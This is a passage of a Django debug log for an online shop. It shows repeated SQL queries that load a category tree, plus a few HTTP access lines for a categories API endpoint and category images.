"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 09:47:27,455 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 09:47:27,459 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 09:47:27,465 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 09:47:27,469 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 09:47:27,473 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 09:47:27,478 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 09:47:27,483 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 09:47:27,489 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 09:47:27,493 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 09:47:27,497 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 09:47:27,501 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 09:47:27,505 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 09:47:27,512 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 09:47:27,516 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 09:47:27,520 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 09:47:27,524 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 09:47:27,528 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 09:47:27,532 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 09:47:27,537 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 09:47:27,541 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 09:47:27,546 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 09:47:27,551 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 09:47:27,555 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 09:47:27] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 09:47:28] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [20/Dec/2019 09:47:28] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [20/Dec/2019 09:50:25] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 09:50:46,717 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 09:50:46,724 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 09:50:46,727 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 09:50:46,729 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 09:50:46,733 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 09:50:46,735 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 09:50:46,737 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 09:50:46,740 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 09:50:46,743 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 09:50:46,746 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 09:50:46,748 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 09:50:46,751 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 09:50:46,754 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 09:50:46,756 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 09:50:46,760 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 09:50:46,762 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 09:50:46,765 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 09:50:46,767 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 09:50:46,770 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 09:50:46,774 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 09:50:46,777 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 09:50:46,779 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 09:50:46,781 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 09:50:46,783 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 09:50:46,786 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 09:50:46,791 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 09:50:46,794 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 09:50:46,796 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 09:50:46,799 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 09:50:46,802 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 09:50:46,805 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 09:50:46,808 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 09:50:46,810 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 09:50:46,812 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 09:50:46,815 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 09:50:46,819 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 09:50:46,822 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 09:50:46,825 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 09:50:46,829 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 09:50:46,832 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 09:50:46,834 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 09:50:46,837 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 09:50:46,839 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 09:50:46,842 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" 